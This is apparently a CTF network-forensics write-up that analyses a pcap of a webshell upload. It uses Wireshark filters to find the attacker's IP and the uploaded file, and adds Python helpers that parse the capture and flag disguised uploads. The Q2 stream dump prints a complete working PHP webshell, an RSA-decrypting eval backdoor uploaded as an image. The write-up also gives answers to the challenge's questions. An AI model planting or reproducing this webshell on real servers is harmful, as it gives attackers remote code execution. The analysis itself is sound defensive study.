Challenge description: the attachment at the top is the pcap file used in this challenge. Based on it, answer the following 8 questions and finally combine the answers into a flag in MD5 form.
Q1. What is the hacker's IP address?
Q2. What is the name of the file the hacker uploaded through the vulnerability to connect to the server?
Q3. Which tool did the hacker use to connect to the uploaded webshell?
Q4. Which vulnerability did the hacker exploit for the attack?
Q5. What is the connection password the hacker used for the webshell?
Q6. What was the first system command the hacker executed after connecting to the webshell?
Q7. What is the content of the file the hacker uploaded through the webshell?
Q8. What is the name of the system user the hacker created?
Q1
Approach:
In a network attack the hacker (attacker) keeps up frequent communication with the server, so filter for the IP conversation with the most traffic and then determine which side is the attacker.
Steps:
Open Wireshark, go to "Statistics" -> "Conversations" and tick "IPv4". The busiest conversation is between 192.168.11.39 and 192.168.11.93, and in that record 192.168.11.39 is the side that initiates the communication, so the hacker is 192.168.11.39.
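As an added example (not part of the original writeup), the Python below reproduces the Conversations statistic without Wireshark: it writes a small libpcap file from constructed frames, counts packets per IPv4 pair regardless of direction, and names the initiator as the side that sent the first bare SYN. The two addresses are the ones from the capture; the frames, ports and flows are constructed.

```python
import struct
from collections import Counter

def _ip(s):
    return bytes(int(o) for o in s.split("."))

def build_frame(src, dst, tcp_flags):
    """Build one Ethernet/IPv4/TCP frame (constructed test data, not bytes from the challenge pcap)."""
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, 5 << 4, tcp_flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0, _ip(src), _ip(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp  # dummy MACs, EtherType 0x0800 = IPv4

def build_pcap(flows):
    """Wrap frames in a little-endian libpcap file: global header + one record header per frame."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]  # linktype 1 = Ethernet
    for i, (src, dst, flags) in enumerate(flows):
        frame = build_frame(src, dst, flags)
        out.append(struct.pack("<IIII", i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)

def busiest_conversation(pcap):
    """Return ((ip_a, ip_b), packet_count, initiator) for the IPv4 pair with the most packets.
    The initiator is whichever host sent the first bare SYN (SYN set, ACK clear) within that pair."""
    counts, initiator, off = Counter(), {}, 24
    while off + 16 <= len(pcap):
        _, _, caplen, _ = struct.unpack_from("<IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if frame[12:14] != b"\x08\x00":       # not IPv4, skip
            continue
        ihl = (frame[14] & 0x0F) * 4
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        pair = frozenset((src, dst))          # direction-agnostic, like Wireshark's Conversations tab
        counts[pair] += 1
        if frame[23] == 6:                    # TCP: the flags byte sits 13 bytes into the TCP header
            flags = frame[14 + ihl + 13]
            if flags & 0x12 == 0x02 and pair not in initiator:
                initiator[pair] = src
    pair, n = counts.most_common(1)[0]
    return tuple(sorted(pair)), n, initiator.get(pair)

# Constructed flows: handshake plus data between the two hosts from the capture, and one unrelated probe.
SAMPLE_FLOWS = [
    ("192.168.11.39", "192.168.11.93", 0x02), ("192.168.11.93", "192.168.11.39", 0x12),
    ("192.168.11.39", "192.168.11.93", 0x10), ("192.168.11.39", "192.168.11.93", 0x18),
    ("192.168.11.93", "192.168.11.39", 0x18),
    ("10.0.0.5", "192.168.11.93", 0x02), ("192.168.11.93", "10.0.0.5", 0x12),
]
```

Running `busiest_conversation(build_pcap(SAMPLE_FLOWS))` names the 192.168.11.39 / 192.168.11.93 pair with 5 packets and 192.168.11.39 as initiator; on a real file, read it with `open(path, "rb").read()` instead of `build_pcap`.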

Q2
Approach:
This question is about a file upload vulnerability, so the webshell's file name can be found by following the upload action itself (multipart/form-data). When the hacker submits the webshell with a POST request, the packet's Content-Type is normally multipart/form-data; filter on that to find the relevant packet, then follow its stream to reconstruct the dialogue between the hacker and the server and read the uploaded webshell's name from it.
Steps:
Step 1. Filter the packets. In Wireshark, set a display filter for http.request.method equal to POST and content_type containing "multipart"; only one packet matches, Frame 16651.

```text
http.request.method == POST && http.content_type contains "multipart/form-data"
```

Step 2. Follow the stream for that packet. I have placed the key information in the code block below. Three rounds of conversation with host 192.168.11.93 can be seen. In the first round the hacker issues a POST request whose form uploads a file named san.php (filename="san.php"), and the server returns HTTP/1.1 200 OK. Because a trojan submitted to a server is usually renamed on storage, the hacker then issues a second-round GET request; the server returns HTTP/1.1 200 OK with a large block of HTML, near the bottom of which uploads/1768728211_696ca6939300d_san.php appears, and that is in fact the hacker's uploaded file. With the real path in hand, the hacker's third round is a GET request straight to the trojan just submitted, and the server promptly returns HTTP/1.1 200 OK. From here the hacker can bring out a tool such as AntSword (蚁剑) or Godzilla (哥斯拉) and start controlling the server remotely. Therefore, the name of the uploaded file used to connect to the server is 1768728211_696ca6939300d_san.php.

```http
POST /upload.php HTTP/1.1
Host: 192.168.11.93
Content-Length: 882
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.11.93
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUczYToC2RbAgYvPk
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
------WebKitFormBoundaryUczYToC2RbAgYvPk
Content-Disposition: form-data; name="file"; filename="san.php"
Content-Type: image/jpeg
<?php
@error_reporting(0);
$data = @$_POST['shell'];
if (isset($data)) {
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCd4MxZ+bp49Fy3KF/kfTUbOgaJ
VQTKVbvAEtA+mdowqmPZUKaE2R6EKgBoFSPdifyTtVDj3WjEezSYFiYOZlYwEYT6
RhzwnmczKI/QKDq1+BUZqKF0FdyoQVJIo/3M5t+uBVswwlQ5l+eBo9fCdXqrI5xJ
xib6Z/MRrAYtbLkykwIDAQAB
-----END PUBLIC KEY-----
EOF;
$pk_res = openssl_pkey_get_public($pk);
$chunks = explode("|", $data);
$payload = '';
foreach ($chunks as $chunk) {
$decrypted = '';
if (openssl_public_decrypt(base64_decode($chunk), $decrypted, $pk_res)) {
$payload .= $decrypted;
}
}
eval($payload);
}
?>
------WebKitFormBoundaryUczYToC2RbAgYvPk--
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
GET /admin.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>............ - ..................</title>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
.admin-header {
background: linear-gradient(135deg, #2c3e50 0%, #34495e 100%);
color: white;
padding: 20px 0;
margin-bottom: 30px;
}
.admin-main {
min-height: 600px;
}
.admin-stats {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
gap: 20px;
margin-bottom: 30px;
}
.stat-card {
background: white;
padding: 25px;
border-radius: 12px;
box-shadow: 0 5px 15px rgba(0,0,0,0.05);
text-align: center;
transition: transform 0.3s;
}
.stat-card:hover {
transform: translateY(-5px);
}
.stat-icon {
font-size: 36px;
margin-bottom: 15px;
color: #3498db;
}
.stat-number {
font-size: 32px;
font-weight: bold;
color: #2c3e50;
margin-bottom: 10px;
}
.stat-label {
color: #666;
font-size: 14px;
}
.admin-actions {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
gap: 20px;
margin: 30px 0;
}
.action-card {
background: white;
padding: 30px;
border-radius: 12px;
box-shadow: 0 5px 15px rgba(0,0,0,0.05);
text-decoration: none;
color: inherit;
transition: all 0.3s;
border-left: 4px solid #3498db;
}
.action-card:hover {
transform: translateY(-5px);
box-shadow: 0 15px 30px rgba(0,0,0,0.1);
background: #3498db;
color: white;
}
.action-card:hover .action-icon {
color: white;
}
.action-icon {
font-size: 32px;
color: #3498db;
margin-bottom: 15px;
}
.action-title {
font-size: 18px;
margin-bottom: 10px;
font-weight: 600;
}
.action-desc {
color: #666;
font-size: 14px;
}
.action-card:hover .action-desc {
color: rgba(255,255,255,0.9);
}
.admin-table-container {
background: white;
border-radius: 12px;
padding: 30px;
box-shadow: 0 5px 15px rgba(0,0,0,0.05);
margin-top: 30px;
overflow-x: auto;
}
.admin-table {
width: 100%;
border-collapse: collapse;
}
.admin-table th {
background: #f8f9fa;
color: #2c3e50;
font-weight: 600;
text-align: left;
padding: 15px;
border-bottom: 2px solid #e9ecef;
}
.admin-table td {
padding: 15px;
border-bottom: 1px solid #e9ecef;
}
.admin-table tr:hover {
background: #f8f9fa;
}
.file-cell {
display: flex;
align-items: center;
gap: 10px;
}
.file-cell i {
color: #3498db;
}
</style>
</head>
<body>
<header class="admin-header">
<div class="container">
<div class="header-top">
<div class="logo">
<i class="fas fa-tachometer-alt"></i>
<span>...............</span>
</div>
<div class="header-info">
<div class="info-item">
<i class="fas fa-user-shield"></i>
<span>............admin</span>
</div>
<div class="info-item">
<i class="fas fa-sign-out-alt"></i>
<span><a href="logout.php" style="color: white; text-decoration: none;">............</a></span>
</div>
</div>
</div>
<nav class="main-nav">
<ul>
<li class="active"><a href="admin.php"><i class="fas fa-tachometer-alt"></i> .........</a></li>
<li><a href="upload.php"><i class="fas fa-cloud-upload-alt"></i> ............</a></li>
<li><a href="view.php"><i class="fas fa-folder-open"></i> ............</a></li>
<li><a href="#"><i class="fas fa-users"></i> ............</a></li>
<li><a href="#"><i class="fas fa-chart-bar"></i> ............</a></li>
<li><a href="index.php"><i class="fas fa-home"></i> ............</a></li>
</ul>
</nav>
</div>
</header>
<main class="container admin-main">
<div class="admin-stats">
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-users"></i>
</div>
<div class="stat-number">4</div>
<div class="stat-label">............</div>
</div>
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-file-alt"></i>
</div>
<div class="stat-number">6</div>
<div class="stat-label">............</div>
</div>
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-cloud-upload-alt"></i>
</div>
<div class="stat-number">6</div>
<div class="stat-label">............</div>
</div>
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-hdd"></i>
</div>
<div class="stat-number">
0 </div>
<div class="stat-label">............(MB)</div>
</div>
</div>
<h2 class="section-title"><i class="fas fa-welcome"></i> ...........................</h2>
<p style="color: #666; margin-bottom: 30px;">.....................................................................</p>
<div class="admin-actions">
<a href="upload.php" class="action-card">
<div class="action-icon">
<i class="fas fa-cloud-upload-alt"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">...........................</p>
</a>
<a href="view.php" class="action-card">
<div class="action-icon">
<i class="fas fa-folder-open"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">...........................</p>
</a>
<a href="#" class="action-card">
<div class="action-icon">
<i class="fas fa-users-cog"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">...........................</p>
</a>
<a href="#" class="action-card">
<div class="action-icon">
<i class="fas fa-chart-line"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">..............................</p>
</a>
</div>
<div class="admin-table-container">
<h3 class="section-title" style="margin-top: 0;"><i class="fas fa-history"></i> .....................</h3>
<table class="admin-table">
<thead>
<tr>
<th>.........</th>
<th>......</th>
<th>............</th>
<th>......</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-code"></i>
<span>san.php</span>
</div>
</td>
<td>0.7 KB</td>
<td>2026-01-18 17:23</td>
<td>
<a href="uploads/1768728211_696ca6939300d_san.php"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768728211_696ca6939300d_san.php"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-code"></i>
<span>san.php</span>
</div>
</td>
<td>0.7 KB</td>
<td>2026-01-18 15:31</td>
<td>
<a href="uploads/1768721510_696c8c668ba5e_san.php"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768721510_696c8c668ba5e_san.php"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-code"></i>
<span>san.php</span>
</div>
</td>
<td>0.5 KB</td>
<td>2026-01-18 15:18</td>
<td>
<a href="uploads/1768720729_696c89591a5fc_san.php"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768720729_696c89591a5fc_san.php"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-image"></i>
<span>san.jpg</span>
</div>
</td>
<td>0.5 KB</td>
<td>2026-01-18 15:18</td>
<td>
<a href="uploads/1768720704_696c8940c0407_san.jpg"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768720704_696c8940c0407_san.jpg"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-image"></i>
<span>san.jpg</span>
</div>
</td>
<td>0.5 KB</td>
<td>2026-01-18 15:08</td>
<td>
<a href="uploads/1768720109_696c86ed6d272.jpg"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768720109_696c86ed6d272.jpg"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
</tbody>
</table>
<div style="text-align: center; margin-top: 20px;">
<a href="view.php" class="btn btn-outline">..................</a>
</div>
</div>
</main>
</body>
</html>
GET /uploads/1768728211_696ca6939300d_san.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
```
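An added example, not part of the original writeup: the Python below does Step 2 programmatically on a constructed, trimmed copy of the captured POST. It pulls out the form field, filename and declared Content-Type of each multipart part, flags the two things a defender would alert on (a .php filename declared as image/jpeg, and PHP code in the body), and recovers the renamed server-side path from a fragment of the admin.php listing. The regexes and helper names are my own.

```python
import re
PHP_EXTS = (".php", ".phtml", ".phar")

# Constructed request modelled on the captured upload (trimmed to the relevant lines, not the raw pcap bytes).
SAMPLE_REQUEST = (
    "POST /upload.php HTTP/1.1\r\nHost: 192.168.11.93\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUczYToC2RbAgYvPk\r\n\r\n"
    "------WebKitFormBoundaryUczYToC2RbAgYvPk\r\n"
    'Content-Disposition: form-data; name="file"; filename="san.php"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "<?php\n@error_reporting(0);\n$data = @$_POST['shell'];\r\n"
    "------WebKitFormBoundaryUczYToC2RbAgYvPk--\r\n"
)
# Constructed fragment of the admin.php listing that reveals the server-side file name.
SAMPLE_ADMIN_HTML = ('<a href="uploads/1768728211_696ca6939300d_san.php" target="_blank">view</a>'
                     '<a href="uploads/1768720704_696c8940c0407_san.jpg" download>download</a>')

def parse_multipart(raw):
    """Split a raw multipart/form-data request into (field name, filename, declared type, body) tuples."""
    head, _, body = raw.partition("\r\n\r\n")
    m = re.search(r"boundary=([^\r\n;]+)", head)
    if not m: return []
    parts = []
    for chunk in body.split("--" + m.group(1))[1:]:
        if chunk.startswith("--"):            # closing delimiter "--boundary--"
            break
        phead, _, pbody = chunk.lstrip("\r\n").partition("\r\n\r\n")
        pbody = pbody[:-2] if pbody.endswith("\r\n") else pbody   # the CRLF before the next boundary
        get = lambda pat: (re.search(pat, phead, re.I) or [None, None])[1]
        parts.append((get(r';\s*name="([^"]*)"'), get(r'filename="([^"]*)"'),
                      get(r"Content-Type:\s*([^\r\n]+)"), pbody))
    return parts

def suspicious_uploads(raw):
    """Flag file parts whose name says PHP while the declared type says image, or whose body carries PHP code."""
    findings = []
    for _, fname, ctype, body in parse_multipart(raw):
        if not fname: continue
        reasons = []
        if fname.lower().endswith(PHP_EXTS) and (ctype or "").lower().startswith("image/"):
            reasons.append("extension/MIME mismatch")
        if "<?php" in body or "eval(" in body:
            reasons.append("PHP code in body")
        if reasons:
            findings.append((fname, ctype, reasons))
    return findings

def stored_php_paths(html):
    """Recover the renamed upload paths (uploads/<timestamp>_<uniqid>_<name>.php) from the listing page."""
    return sorted(set(re.findall(r"uploads/\d+_[0-9a-f]+_[\w.-]+\.php", html)))
```

On the constructed input, `suspicious_uploads` reports san.php declared as image/jpeg with PHP in its body, and `stored_php_paths` returns only the .php entry, the same uploads/1768728211_696ca6939300d_san.php that Step 2 reads off the page by hand.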